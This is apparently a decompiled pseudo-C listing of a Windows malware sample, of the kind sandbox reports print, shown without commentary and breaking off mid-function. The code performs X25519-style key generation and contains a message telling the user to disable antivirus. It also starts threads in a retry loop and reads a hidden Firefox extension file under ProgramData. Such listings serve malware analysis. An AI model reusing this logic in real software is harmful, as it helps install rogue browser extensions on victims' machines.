                                                                    				_push(0xec7d74);
                                                                    				_push( *[fs:0x0]);
                                                                    				_t485 =  *0xeef074; // 0xa6abe2d4
                                                                    				_v32 = _t485 ^ _t917;
                                                                    				 *[fs:0x0] =  &_v24;
                                                                    				_v1192 = __edx;
                                                                    				_v1196 = __ecx;
                                                                    				_t885 =  *((intOrPtr*)(_t728 + 0x10));
                                                                    				_v40 =  *((intOrPtr*)(_t728 + 8));
                                                                    				_v1184 = 0;
                                                                    				_v1204 =  *((intOrPtr*)(_t728 + 0x14));
                                                                    				_v212 = 0;
                                                                    				_v208 = 0;
                                                                    				_v1208 = _t885;
                                                                    				_v1216 =  *((intOrPtr*)(_t728 + 0x18));
                                                                    				_v212 = 0;
                                                                    				_v208 = 0xf;
                                                                    				_v228 = 0;
                                                                    				_t491 = E00E83C10(_t728, __edx, _t885, __esi, 0x30, _t485 ^ _t917, __edi);
                                                                    				_v212 = 0x20;
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				_v208 = 0x2f;
                                                                    				_v1188 = _t491;
                                                                    				asm("movups [eax], xmm0");
                                                                    				_v228 = _t491;
                                                                    				asm("movups [eax+0x10], xmm0");
                                                                    				 *((char*)(_t491 + 0x20)) = 0;
                                                                    				_v16 = 0;
                                                                    				_t733 =  &_v156;
                                                                    				_v140 = 0;
                                                                    				_v136 = 0;
                                                                    				_v140 = 0;
                                                                    				_v136 = 0xf;
                                                                    				_v156 = 0;
                                                                    				_t898 = E00E83C10(_t728, __edx, _t885, __esi, 0xfb0, __esi, _t728);
                                                                    				_v140 = 0xfa0;
                                                                    				_v136 = 0xfaf;
                                                                    				E00EA8F90(_t885, _t898, 0, 0xfa0);
                                                                    				 *((char*)(_t898 + 0xfa0)) = 0;
                                                                    				_t929 = _t927 - 0x5a8 + 0xc;
                                                                    				_v156 = _t898;
                                                                    				_v16 = 1;
                                                                    				_v164 = 0;
                                                                    				_v160 = 0;
                                                                    				_v164 = 0;
                                                                    				_v160 = 0xf;
                                                                    				_v180 = 0;
                                                                    				_v16 = 2;
                                                                    				_t899 = _v1188;
                                                                    				if(_v1192 != 0) {
                                                                    					asm("movups xmm0, [eax+0x28]");
                                                                    					asm("movups [esi], xmm0");
                                                                    					asm("movups xmm0, [eax+0x38]");
                                                                    					asm("movups [esi+0x10], xmm0");
                                                                    					_t899 = _v228;
                                                                    				}
                                                                    				_push(_t733);
                                                                    				_t859 =  >=  ? _v156 :  &_v156;
                                                                    				_t495 = E00E8DAF0(_t728, _v40,  >=  ? _v156 :  &_v156, _t885, _t899);
                                                                    				_t735 = _v140;
                                                                    				_t930 = _t929 + 4;
                                                                    				if(_t495 > _t735) {
                                                                    					__eflags = _t495 - _t735;
                                                                    					_push(0);
                                                                    					E00E73160(_t728,  &_v156, _t885, _t495 - _t735);
                                                                    				} else {
                                                                    					_v140 = _t495;
                                                                    					_t856 =  >=  ? _v156 :  &_v156;
                                                                    					 *((char*)(( >=  ? _v156 :  &_v156) + _t495)) = 0;
                                                                    				}
                                                                    				_v188 = 0;
                                                                    				_v184 = 0;
                                                                    				_v188 = 0;
                                                                    				_v184 = 0xf;
                                                                    				_v204 = 0;
                                                                    				_v16 = 3;
                                                                    				_push(0);
                                                                    				E00E73160(_t728,  &_v204, _t885, 4);
                                                                    				_t738 =  *((intOrPtr*)(_t728 + 0xc));
                                                                    				_t500 =  >=  ? _v204 :  &_v204;
                                                                    				 *((char*)( >=  ? _v204 :  &_v204)) = _t738;
                                                                    				_t502 =  >=  ? _v204 :  &_v204;
                                                                    				 *((char*)(( >=  ? _v204 :  &_v204) + 1)) = _t738;
                                                                    				_t740 =  >=  ? _v204 :  &_v204;
                                                                    				 *((char*)(( >=  ? _v204 :  &_v204) + 2)) =  *((intOrPtr*)(_t728 + 0xe));
                                                                    				_t742 =  >=  ? _v204 :  &_v204;
                                                                    				 *((char*)(( >=  ? _v204 :  &_v204) + 3)) =  *((intOrPtr*)(_t728 + 0xf));
                                                                    				_v16 = 4;
                                                                    				_t743 =  *((intOrPtr*)(_t885 + 0x10));
                                                                    				if(0x7fffffff -  *((intOrPtr*)(_t885 + 0x10)) < 2) {
                                                                    					_t507 = E00E59480(_t743);
                                                                    					goto L48;
                                                                    				} else {
                                                                    					_t658 = _t885;
                                                                    					if( *((intOrPtr*)(_t885 + 0x14)) >= 0x10) {
                                                                    						_t658 =  *_t885;
                                                                    					}
                                                                    					_t659 = E00E77F80( &_v1476, _v1208, _t743, _t658, _t743, "><", 2);
                                                                    					_v1184 = 1;
                                                                    					_v16 = 5;
                                                                    					_push( *0xf29258);
                                                                    					_t816 =  >=  ?  *0xf29248 : 0xf29248;
                                                                    					_t660 = E00E82E90(_t728, _t659, _t885,  >=  ?  *0xf29248 : 0xf29248);
                                                                    					_v1436 = 0;
                                                                    					_v1432 = 0;
                                                                    					_v1184 = 3;
                                                                    					asm("movups xmm0, [eax]");
                                                                    					asm("movups [ebp-0x5a0], xmm0");
                                                                    					asm("movq xmm0, [eax+0x10]");
                                                                    					asm("movq [ebp-0x590], xmm0");
                                                                    					 *(_t660 + 0x10) = 0;
                                                                    					 *(_t660 + 0x14) = 0xf;
                                                                    					 *_t660 = 0;
                                                                    					_v16 = 6;
                                                                    					_push(2);
                                                                    					_t661 = E00E82E90(_t728,  &_v1452, _t885, "<>");
                                                                    					_v1412 = 0;
                                                                    					_v1408 = 0;
                                                                    					_v1184 = 7;
                                                                    					asm("movups xmm0, [eax]");
                                                                    					asm("movups [ebp-0x588], xmm0");
                                                                    					asm("movq xmm0, [eax+0x10]");
                                                                    					asm("movq [ebp-0x578], xmm0");
                                                                    					 *(_t661 + 0x10) = 0;
                                                                    					 *(_t661 + 0x14) = 0xf;
                                                                    					 *_t661 = 0;
                                                                    					_v16 = 7;
                                                                    					_push(_v188);
                                                                    					_t663 =  >=  ? _v204 :  &_v204;
                                                                    					_t664 = E00E82E90(_t728,  &_v1428, _t885,  >=  ? _v204 :  &_v204);
                                                                    					_v1388 = 0;
                                                                    					_v1384 = 0;
                                                                    					_v1184 = 0xf;
                                                                    					asm("movups xmm0, [eax]");
                                                                    					asm("movups [ebp-0x570], xmm0");
                                                                    					asm("movq xmm0, [eax+0x10]");
                                                                    					asm("movq [ebp-0x560], xmm0");
                                                                    					 *(_t664 + 0x10) = 0;
                                                                    					 *(_t664 + 0x14) = 0xf;
                                                                    					 *_t664 = 0;
                                                                    					_v16 = 8;
                                                                    					_push(4);
                                                                    					_t665 = E00E82E90(_t728,  &_v1404, _t885, ":A3Y");
                                                                    					_v1364 = 0;
                                                                    					_v1360 = 0;
                                                                    					_v1184 = 0x1f;
                                                                    					asm("movups xmm0, [eax]");
                                                                    					asm("movups [ebp-0x558], xmm0");
                                                                    					asm("movq xmm0, [eax+0x10]");
                                                                    					asm("movq [ebp-0x548], xmm0");
                                                                    					 *(_t665 + 0x10) = 0;
                                                                    					 *(_t665 + 0x14) = 0xf;
                                                                    					 *_t665 = 0;
                                                                    					_v16 = 9;
                                                                    					_push(_v212);
                                                                    					_t667 =  >=  ? _t899 :  &_v228;
                                                                    					_t668 = E00E82E90(_t728,  &_v1380, _t885,  >=  ? _t899 :  &_v228);
                                                                    					_v1340 = 0;
                                                                    					_v1336 = 0;
                                                                    					_v1184 = 0x3f;
                                                                    					asm("movups xmm0, [eax]");
                                                                    					asm("movups [ebp-0x540], xmm0");
                                                                    					asm("movq xmm0, [eax+0x10]");
                                                                    					asm("movq [ebp-0x530], xmm0");
                                                                    					 *(_t668 + 0x10) = 0;
                                                                    					 *(_t668 + 0x14) = 0xf;
                                                                    					 *_t668 = 0;
                                                                    					_v16 = 0xa;
                                                                    					_push(3);
                                                                    					_t669 = E00E82E90(_t728,  &_v1356, _t885, "R5,");
                                                                    					_v1316 = 0;
                                                                    					_v1312 = 0;
                                                                    					_v1184 = 0x7f;
                                                                    					asm("movups xmm0, [eax]");
                                                                    					asm("movups [ebp-0x528], xmm0");
                                                                    					asm("movq xmm0, [eax+0x10]");
                                                                    					asm("movq [ebp-0x518], xmm0");
                                                                    					 *(_t669 + 0x10) = 0;
                                                                    					 *(_t669 + 0x14) = 0xf;
                                                                    					 *_t669 = 0;
                                                                    					_v16 = 0xb;
                                                                    					_push(_v140);
                                                                    					_t671 =  >=  ? _v156 :  &_v156;
                                                                    					_t672 = E00E82E90(_t728,  &_v1332, _t885,  >=  ? _v156 :  &_v156);
                                                                    					_v1252 = 0;
                                                                    					_v1248 = 0;
                                                                    					asm("movups xmm0, [eax]");
                                                                    					asm("movups [ebp-0x4e8], xmm0");
                                                                    					asm("movups [ebp-0x510], xmm0");
                                                                    					asm("movq xmm0, [eax+0x10]");
                                                                    					asm("movq [ebp-0x4d8], xmm0");
                                                                    					asm("movq [ebp-0x20], xmm0");
                                                                    					 *(_t672 + 0x10) = 0;
                                                                    					 *(_t672 + 0x14) = 0xf;
                                                                    					 *_t672 = 0;
                                                                    					_v1184 = 0xff;
                                                                    					L00E83B80(_t728,  &_v180, _t885);
                                                                    					asm("movups xmm0, [ebp-0x510]");
                                                                    					_v1252 = 0;
                                                                    					_v1248 = 0xf;
                                                                    					asm("movups [ebp-0xa8], xmm0");
                                                                    					_v1268 = 0;
                                                                    					asm("movq xmm0, [ebp-0x20]");
                                                                    					_v1184 = 0xff;
                                                                    					asm("movq [ebp-0x98], xmm0");
                                                                    					_v1184 = 0xff;
                                                                    					_v16 = 0xa;
                                                                    					L00E83B80(_t728,  &_v1268, _t885);
                                                                    					_v1184 = 0xff;
                                                                    					_v16 = 9;
                                                                    					L00E83B80(_t728,  &_v1332, _t885);
                                                                    					_v1184 = 0xff;
                                                                    					_v16 = 8;
                                                                    					L00E83B80(_t728,  &_v1356, _t885);
                                                                    					_v1184 = 0xff;
                                                                    					_v16 = 7;
                                                                    					L00E83B80(_t728,  &_v1380, _t885);
                                                                    					_v1184 = 0xff;
                                                                    					_v16 = 6;
                                                                    					L00E83B80(_t728,  &_v1404, _t885);
                                                                    					_v1184 = 0xff;
                                                                    					_v16 = 5;
                                                                    					L00E83B80(_t728,  &_v1428, _t885);
                                                                    					_v1184 = 0xff;
                                                                    					_v16 = 4;
                                                                    					L00E83B80(_t728,  &_v1452, _t885);
                                                                    					_v1184 = 0xff;
                                                                    					_v16 = 3;
                                                                    					L00E83B80(_t728,  &_v1476, _t885);
                                                                    					E00EA8F90(_t885,  &_v300, 0, 0x48);
                                                                    					_v296 = 0xedca48;
                                                                    					E00EA8F90(_t885,  &_v372, 0, 0x48);
                                                                    					_t969 = _t930 + 0x18;
                                                                    					_v368 = 0xedca48;
                                                                    					if(_v1196 != 0) {
                                                                    						asm("xorps xmm0, xmm0");
                                                                    						asm("movups [ebp-0xf8], xmm0");
                                                                    						asm("movups [ebp-0xe8], xmm0");
                                                                    						_t724 =  *0xf2c0b0( &_v260, 0x20);
                                                                    						_t853 = _v260;
                                                                    						_t725 = _v229;
                                                                    						if(_t724 != 0) {
                                                                    							_t853 = _t853 & 0x000000f8;
                                                                    							_t725 = _t725 & 0x0000003f | 0x00000040;
                                                                    							_v260 = _t853;
                                                                    							_v229 = _t725;
                                                                    						}
                                                                    						if((_t853 & 0x00000007) == 0) {
                                                                    							_t996 = _t725;
                                                                    							if(_t725 >= 0) {
                                                                    								E00E93D60( &_v292,  &_v260, _t885, 0, _t996, 0xedea50);
                                                                    								_t969 = _t969 + 4;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					_t686 = _v1204;
                                                                    					_t833 =  *((intOrPtr*)(_t686 + 0x10));
                                                                    					if( *((intOrPtr*)(_t686 + 0x14)) >= 0x10) {
                                                                    						_t686 =  *_t686;
                                                                    					}
                                                                    					if(_t686 != 0 && _t833 == 0x20) {
                                                                    						asm("movups xmm0, [eax]");
                                                                    						_v368 = 0xedca48;
                                                                    						asm("movups [ebp-0x160], xmm0");
                                                                    						asm("movups xmm0, [eax+0x10]");
                                                                    						asm("movups [ebp-0x150], xmm0");
                                                                    					}
                                                                    					_push(_t833);
                                                                    					_v1204 = 0x20;
                                                                    					E00E8CD60( &_v300,  &_v372, _t885, 0,  &_v132,  &_v1204);
                                                                    					_v380 = 0;
                                                                    					E00E918B0( &_v596);
                                                                    					E00E91590( &_v596,  &_v132, 0x20);
                                                                    					_t971 = _t969 + 0x10;
                                                                    					if(E00E91760( &_v596) == 0) {
                                                                    						asm("movups xmm0, [ebp-0x248]");
                                                                    						asm("movups [ebp-0x58], xmm0");
                                                                    						asm("movups xmm0, [ebp-0x238]");
                                                                    						asm("movups [ebp-0x48], xmm0");
                                                                    						asm("movups xmm0, [ebp-0x228]");
                                                                    						asm("movups [ebp-0x38], xmm0");
                                                                    						E00E918B0( &_v596);
                                                                    					}
                                                                    					_push(7);
                                                                    					E00E82E90(_t728,  &_v180, _t885, "goodjob");
                                                                    					_t694 = _v164;
                                                                    					_v1188 = _t694;
                                                                    					_t209 = _t694 + 0x20; // 0x20
                                                                    					_t894 = _t209;
                                                                    					_t912 = E00EAF157(_t894, 8);
                                                                    					_t839 =  >=  ? _v180 :  &_v180;
                                                                    					_v1192 = _t912;
                                                                    					E00EA90F0(_t912,  >=  ? _v180 :  &_v180, _v1188);
                                                                    					asm("movups xmm0, [ebp-0x118]");
                                                                    					asm("movups [eax+esi], xmm0");
                                                                    					_push(0x14);
                                                                    					asm("movups xmm0, [ebp-0x108]");
                                                                    					_push(_v1188);
                                                                    					_push(_t912);
                                                                    					asm("movups [eax+esi+0x10], xmm0");
                                                                    					_push(_t912);
                                                                    					_push( &_v68);
                                                                    					_push( &_v100);
                                                                    					E00EA4A70();
                                                                    					_t701 = _v1188;
                                                                    					_t219 = _t894 + 0x10; // 0x30
                                                                    					_t840 = _t219;
                                                                    					_t973 = _t971 + 0x2c;
                                                                    					if(_t840 > _t701) {
                                                                    						__eflags = _t840 - _t701;
                                                                    						_push(0);
                                                                    						E00E73160(_t728,  &_v180, _t894, _t840 - _t701);
                                                                    					} else {
                                                                    						_v164 = _t840;
                                                                    						_t721 =  >=  ? _v180 :  &_v180;
                                                                    						 *((char*)(_t840 + ( >=  ? _v180 :  &_v180))) = 0;
                                                                    					}
                                                                    					_t843 = _v156;
                                                                    					asm("xorps xmm0, xmm0");
                                                                    					_v852 = 0;
                                                                    					_t914 =  >=  ? _t843 :  &_v156;
                                                                    					asm("movups [ebp-0x35c], xmm0");
                                                                    					if(_v1196 != 0 && _t914 != 0) {
                                                                    						E00EA8F90(_t894, _t914, 0, 0x2c);
                                                                    						_t973 = _t973 + 0xc;
                                                                    						 *0xf2c0b0(_t914, 0x2c);
                                                                    						_t843 = _v156;
                                                                    					}
                                                                    					_push(1);
                                                                    					_v856 = 0;
                                                                    					_push(0);
                                                                    					asm("xorps xmm0, xmm0");
                                                                    					_t878 =  >=  ? _t843 :  &_v156;
                                                                    					asm("movups [ebp-0x35c], xmm0");
                                                                    					asm("movups [ebp-0x28], xmm0");
                                                                    					_t705 = E00E8BD20( &_v1180,  >=  ? _t843 :  &_v156, 0x20,  &_v52);
                                                                    					_t974 = _t973 + 0x10;
                                                                    					if(_t705 == 0) {
                                                                    						E00E8ADE0( &_v1180,  &_v52,  &_v888);
                                                                    						_t974 = _t974 + 4;
                                                                    					}
                                                                    					_t899 = _v1192;
                                                                    					_t707 =  >=  ? _v180 :  &_v180;
                                                                    					_t895 = _t894 + ( >=  ? _v180 :  &_v180);
                                                                    					_t709 =  >=  ? _v156 :  &_v156;
                                                                    					_t710 = ( >=  ? _v156 :  &_v156) + 0x20;
                                                                    					_t880 =  >=  ? _v180 :  &_v180;
                                                                    					_t885 = _v1188 + 0x20;
                                                                    					E00E8C6D0( &_v1180,  >=  ? _v180 :  &_v180, _t885, _t899, _t899, _t885, ( >=  ? _v156 :  &_v156) + 0x20, 0xc, _t894 + ( >=  ? _v180 :  &_v180), 0x10, 0, 0);
                                                                    					E00E919E0( &_v844, _t885);
                                                                    					_t713 = _v1216;
                                                                    					_t976 = _t974 + 0x20;
                                                                    					_v1200 = 0;
                                                                    					_t847 =  *((intOrPtr*)(_t713 + 0x10));
                                                                    					if( *((intOrPtr*)(_t713 + 0x14)) >= 0x10) {
                                                                    						_t713 =  *_t713;
                                                                    					}
                                                                    					E00E8D540(_t713,  &_v1200,  &_v844, _t847);
                                                                    					_t930 = _t976 + 8;
                                                                    					_t507 =  *0xf2c318; // 0x0
                                                                    					if(_t507 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                                                                    						L48:
                                                                    						E00EA7D8A(_t507, 0xf2c318);
                                                                    						_t931 = _t930 + 4;
                                                                    						__eflags =  *0xf2c318 - 0xffffffff;
                                                                    						if( *0xf2c318 == 0xffffffff) {
                                                                    							_v16 = 0xc;
                                                                    							_t810 = _v844;
                                                                    							__eflags = _t810;
                                                                    							if(_t810 != 0) {
                                                                    								_t873 = (_t810 * 8 - _t810) * 4 - 0x1c;
                                                                    								_t653 =  *(_v832 + _t810 * 4 - 4);
                                                                    								__eflags = _t653;
                                                                    								if(_t653 != 0) {
                                                                    									do {
                                                                    										_t873 = _t873 + 1;
                                                                    										_t653 = _t653 >> 1;
                                                                    										__eflags = _t653;
                                                                    									} while (_t653 != 0);
                                                                    								}
                                                                    							} else {
                                                                    								_t873 = 0;
                                                                    							}
                                                                    							__eflags = _t873 & 0x00000007;
                                                                    							asm("cdq");
                                                                    							 *0xf2c31c = (0 | (_t873 & 0x00000007) != 0x00000000) + (_t873 + (_t873 & 0x00000007) >> 3);
                                                                    							_v16 = 3;
                                                                    							E00EA7D40(0xf2c318);
                                                                    							_t931 = _t931 + 4;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				_t744 =  *0xf2c31c; // 0x0
                                                                    				_t1014 = _t885 - _t744;
                                                                    				if(_t885 < _t744) {
                                                                    					E00EAF1BC(_t899,  ~(0 | _t1014 > 0x00000000) | _t744 + 0x00000014, 8);
                                                                    					_t893 =  *0xf2c31c; // 0x0
                                                                    					_t931 = _t931 + 0xc;
                                                                    					_t885 = _t893 + 0x14;
                                                                    				}
                                                                    				_push(_v1196);
                                                                    				_t746 =  >=  ? _v156 :  &_v156;
                                                                    				_push( &_v844);
                                                                    				_push(_t885);
                                                                    				_push(_t899);
                                                                    				_t510 = E00E92920( >=  ? _v156 :  &_v156, 0x2c);
                                                                    				_t933 = _t931 - 0x20 + 0x30;
                                                                    				_v1200 = _t510;
                                                                    				E00E91CE0( &_v844);
                                                                    				_t512 = _v1200;
                                                                    				if(_t512 > _t885) {
                                                                    					_t512 = memcpy(0, _t899, 0xfa << 2);
                                                                    					_t933 = _t933 + 0xc;
                                                                    					_t899 = _v1192;
                                                                    				}
                                                                    				_push(_t512);
                                                                    				_v1276 = 0;
                                                                    				_v1272 = 0;
                                                                    				_v1276 = 0;
                                                                    				_v1272 = 0xf;
                                                                    				_v1292 = 0;
                                                                    				L00E83CB0(_t728,  &_v1292, _t899);
                                                                    				_v16 = 0xe;
                                                                    				_push(_v164);
                                                                    				_t515 =  >=  ? _v180 :  &_v180;
                                                                    				_t516 = E00E78300( &_v1292,  &_v1292,  >=  ? _v180 :  &_v180);
                                                                    				_t886 = _v1208;
                                                                    				_v1228 = 0;
                                                                    				_v1224 = 0;
                                                                    				asm("movups xmm0, [eax]");
                                                                    				asm("movups [ebp-0x4d0], xmm0");
                                                                    				asm("movups [ebp-0x510], xmm0");
                                                                    				asm("movq xmm0, [eax+0x10]");
                                                                    				asm("movq [ebp-0x4c0], xmm0");
                                                                    				 *(_t516 + 0x10) = 0;
                                                                    				 *(_t516 + 0x14) = 0xf;
                                                                    				 *_t516 = 0;
                                                                    				_t518 = _v1184 | 0x00000100;
                                                                    				asm("movq [ebp-0x4b8], xmm0");
                                                                    				_v1184 = _t518;
                                                                    				if(_t886 !=  &_v1244) {
                                                                    					L00E83B80(_t728, _t886, _t886);
                                                                    					asm("movups xmm0, [ebp-0x510]");
                                                                    					_t518 = _v1184;
                                                                    					_v1228 = 0;
                                                                    					asm("movups [edi], xmm0");
                                                                    					_v1224 = 0xf;
                                                                    					asm("movq xmm0, [ebp-0x4b8]");
                                                                    					asm("movq [edi+0x10], xmm0");
                                                                    					_v1244 = 0;
                                                                    				}
                                                                    				_v1184 = _t518 & 0xfffffeff;
                                                                    				_v16 = 0xd;
                                                                    				L00E83B80(_t728,  &_v1244, _t886);
                                                                    				_v16 = 3;
                                                                    				L00E83B80(_t728,  &_v1292, _t886);
                                                                    				_t522 = E00EA5E4B(0xf2c23c);
                                                                    				_t934 = _t933 + 4;
                                                                    				if(_t522 != 0) {
                                                                    					_push(_t522);
                                                                    					E00EA5F4D(_t728,  &_v1292, 0x2c, _t886, _t899);
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					asm("int3");
                                                                    					_push(_t728);
                                                                    					_t729 = _t934;
                                                                    					_t937 = (_t934 - 0x00000008 & 0xfffffff8) + 4;
                                                                    					_push(_t917);
                                                                    					_v1500 =  *((intOrPtr*)(_t729 + 4));
                                                                    					_t919 = _t937;
                                                                    					_push(0xffffffff);
                                                                    					_push(0xec7dad);
                                                                    					_push( *[fs:0x0]);
                                                                    					_push(_t729);
                                                                    					_t938 = _t937 - 0x18c;
                                                                    					_t525 =  *0xeef074; // 0xa6abe2d4
                                                                    					_t526 = _t525 ^ _t919;
                                                                    					_v1524 = _t526;
                                                                    					_push(_t899);
                                                                    					_push(_t526);
                                                                    					 *[fs:0x0] =  &_v1516;
                                                                    					_v1564 = 0;
                                                                    					_v1560 = 0;
                                                                    					_v1564 = 0;
                                                                    					_v1560 = 7;
                                                                    					_v1580 = 0;
                                                                    					_v1508 = 0;
                                                                    					asm("o16 nop [eax+eax]");
                                                                    					while(1) {
                                                                    						_v424 = 0;
                                                                    						_v48 = 0;
                                                                    						asm("xorps xmm0, xmm0");
                                                                    						_v44 = 0;
                                                                    						__eflags = 0;
                                                                    						_v64 = 0;
                                                                    						_v60 = 0;
                                                                    						asm("movq [ebp-0x24], xmm0");
                                                                    						_v42 = 0;
                                                                    						asm("movq [ebp-0x34], xmm0");
                                                                    						_v58 = 0;
                                                                    						 *0xf2c0b0( &_v56, 0xf);
                                                                    						_t754 =  &_v56;
                                                                    						_t900 = 0xb;
                                                                    						_t861 =  &_v72;
                                                                    						while(1) {
                                                                    							__eflags =  *_t754 -  *_t861;
                                                                    							if( *_t754 !=  *_t861) {
                                                                    								break;
                                                                    							}
                                                                    							_t754 = _t754 + 4;
                                                                    							_t861 = _t861 + 4;
                                                                    							_t900 = _t900 - 4;
                                                                    							__eflags = _t900;
                                                                    							if(_t900 >= 0) {
                                                                    								continue;
                                                                    							} else {
                                                                    								__eflags =  *_t754 -  *_t861;
                                                                    								if( *_t754 !=  *_t861) {
                                                                    									break;
                                                                    								} else {
                                                                    									__eflags =  *((intOrPtr*)(_t754 + 2)) -  *((intOrPtr*)(_t861 + 2));
                                                                    									if( *((intOrPtr*)(_t754 + 2)) ==  *((intOrPtr*)(_t861 + 2))) {
                                                                    										_t861 = 1;
                                                                    										E00E59EB0(_t729, L"rngerror ,disabable av", 1, _t886, _t900);
                                                                    										_t757 = 0;
                                                                    										__eflags = 0;
                                                                    										E00E86E30(0, _t900);
                                                                    										_t542 = E00EAF11C(0x15b3);
                                                                    									} else {
                                                                    										break;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							L78:
                                                                    							_push(_t542);
                                                                    							E00EA5F4D(_t729, _t757, _t861, _t886, _t900);
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							asm("int3");
                                                                    							_push(_t729);
                                                                    							_t730 = _t938;
                                                                    							_t944 = (_t938 - 0x00000008 & 0xfffffff8) + 4;
                                                                    							_push(_t919);
                                                                    							_v1936 =  *((intOrPtr*)(_t730 + 4));
                                                                    							_t921 = _t944;
                                                                    							_push(0xffffffff);
                                                                    							_push(0xec7e3c);
                                                                    							_push( *[fs:0x0]);
                                                                    							_push(_t730);
                                                                    							_t945 = _t944 - 0x1b8;
                                                                    							_t545 =  *0xeef074; // 0xa6abe2d4
                                                                    							_t546 = _t545 ^ _t921;
                                                                    							_v1960 = _t546;
                                                                    							_push(_t900);
                                                                    							_push(_t886);
                                                                    							_push(_t546);
                                                                    							 *[fs:0x0] =  &_v1952;
                                                                    							_v2384 = 0;
                                                                    							_t548 =  *0xf2c0a0; // 0x0
                                                                    							 *0xf2c098 = _t548;
                                                                    							_t549 = _t548 + 1;
                                                                    							__eflags = _t549;
                                                                    							 *0xf2c0a0 = _t549;
                                                                    							do {
                                                                    								_t550 = CreateThread(0, 0, 0xe6c180, 0, 0, 0);
                                                                    								__eflags = _t550;
                                                                    							} while (_t550 == 0);
                                                                    							_v484 = 0;
                                                                    							E00EA8F90(_t886,  &_v224, 0, 0x48);
                                                                    							_t946 = _t945 + 0xc;
                                                                    							_v220 = 0xedca48;
                                                                    							asm("xorps xmm0, xmm0");
                                                                    							asm("movups [ebp-0x98], xmm0");
                                                                    							asm("movups [ebp-0x88], xmm0");
                                                                    							_t554 =  *0xf2c0b0( &_v184, 0x20);
                                                                    							_t758 = _v184;
                                                                    							__eflags = _t554;
                                                                    							_t555 = _v153;
                                                                    							if(_t554 != 0) {
                                                                    								_t758 = _t758 & 0x000000f8;
                                                                    								_t555 = _t555 & 0x0000003f | 0x00000040;
                                                                    								__eflags = _t555;
                                                                    								_v184 = _t758;
                                                                    								_v153 = _t555;
                                                                    							}
                                                                    							__eflags = _t758 & 0x00000007;
                                                                    							if((_t758 & 0x00000007) == 0) {
                                                                    								__eflags = _t555;
                                                                    								if(__eflags >= 0) {
                                                                    									_t758 =  &_v216;
                                                                    									E00E93D60(_t758,  &_v184, _t886, _t900, __eflags, 0xedea50);
                                                                    									_t946 = _t946 + 4;
                                                                    								}
                                                                    							}
                                                                    							asm("xorps xmm0, xmm0");
                                                                    							 *0xf2bfd8 = 0;
                                                                    							asm("movlpd [0xf2c000], xmm0");
                                                                    							asm("movlpd [0xf2c008], xmm0");
                                                                    							asm("movlpd [0xf2c010], xmm0");
                                                                    							asm("movlpd [0xf2c018], xmm0");
                                                                    							asm("movups xmm0, [ebp-0xb8]");
                                                                    							_push(_t758);
                                                                    							 *0xf2bfdc = 0xedca48;
                                                                    							asm("movups [0xf2bfe0], xmm0");
                                                                    							asm("movups xmm0, [ebp-0xa8]");
                                                                    							asm("movups [0xf2bff0], xmm0");
                                                                    							E00E919E0( &_v472, _t886);
                                                                    							E00E93250( &_v472,  &_v472,  &_v488);
                                                                    							_push(0x1770);
                                                                    							 *0xf2bfd0 = E00EAEBCD();
                                                                    							_t560 = E00E8DDC0(_t730,  &_v472, _t559, _t886, _t900, 0x1770);
                                                                    							_v108 = 0;
                                                                    							_v104 = 0;
                                                                    							 *0xf2bfc8 = _t560;
                                                                    							_v108 = 0;
                                                                    							_v104 = 0xf;
                                                                    							_v124 = 0;
                                                                    							_v36 = 0;
                                                                    							_push(0xf29308);
                                                                    							_push(0xf292f0);
                                                                    							_push( &_v124);
                                                                    							_push( *0xf2c098);
                                                                    							_push( &_v472);
                                                                    							E00E6B3D0( &_v488,  &_v224, _t886, _t900, __eflags);
                                                                    							_t864 = L"\\\\?\\c:";
                                                                    							_push(L"\\programdata\\dat");
                                                                    							_t564 = E00E73CB0(_t730,  &_v76, _t864, _t886);
                                                                    							_t951 = _t946 + 0x2c;
                                                                    							_v36 = 2;
                                                                    							_t565 = E00E59260(_t564, L"\\st.xpi");
                                                                    							_v84 = 0;
                                                                    							_v80 = 0;
                                                                    							_v476 = 1;
                                                                    							asm("movups xmm0, [eax]");
                                                                    							asm("movups [ebp-0x44], xmm0");
                                                                    							asm("movq xmm0, [eax+0x10]");
                                                                    							asm("movq [ebp-0x34], xmm0");
                                                                    							 *(_t565 + 0x10) = 0;
                                                                    							 *(_t565 + 0x14) = 7;
                                                                    							 *_t565 = 0;
                                                                    							_v36 = 3;
                                                                    							L00E59AF0(_t730,  &_v76, _t886);
                                                                    							__eflags = _v80 - 8;
                                                                    							_t568 =  >=  ? _v100 :  &_v100;
                                                                    							_t887 = CreateFileW( >=  ? _v100 :  &_v100, 0x120089, 3, 0, 3, 0x80, 0);
                                                                    							__eflags = _t887 - 0xffffffff;
                                                                    							if(_t887 != 0xffffffff) {
                                                                    								_t900 = GetFileSize(_t887, 0);
                                                                    								__eflags = _t900;
                                                                    								if(_t900 != 0) {
                                                                    									_t427 = _t900 - 1; // -1
                                                                    									__eflags = _t427 - 0xffffe;
                                                                    									if(_t427 <= 0xffffe) {
                                                                    										_push(0);
                                                                    										E00E838F0(_t730,  &_v76, _t864, _t887, _t900, _t900);
                                                                    										_v36 = 4;
                                                                    										_t783 =  &_v152;
                                                                    										__eflags = _v56 - 0x10;
                                                                    										_t594 =  >=  ? _v76 :  &_v76;
                                                                    										_t595 = ReadFile(_t887,  >=  ? _v76 :  &_v76, _t900, _t783, 0);
                                                                    										__eflags = _t595;
                                                                    										if(_t595 != 0) {
                                                                    											_push(_t783);
                                                                    											_t597 = E00E71A90( &_v76, "\r\n");
                                                                    											__eflags = _t597 - 0xffffffff;
                                                                    											_t436 = _t597 != 0xffffffff;
                                                                    											__eflags = _t436;
                                                                    											_t787 = 0 | _t436;
                                                                    											_v480 = _t787;
                                                                    											if(_t436 != 0) {
                                                                    												__eflags = _v56 - 0x10;
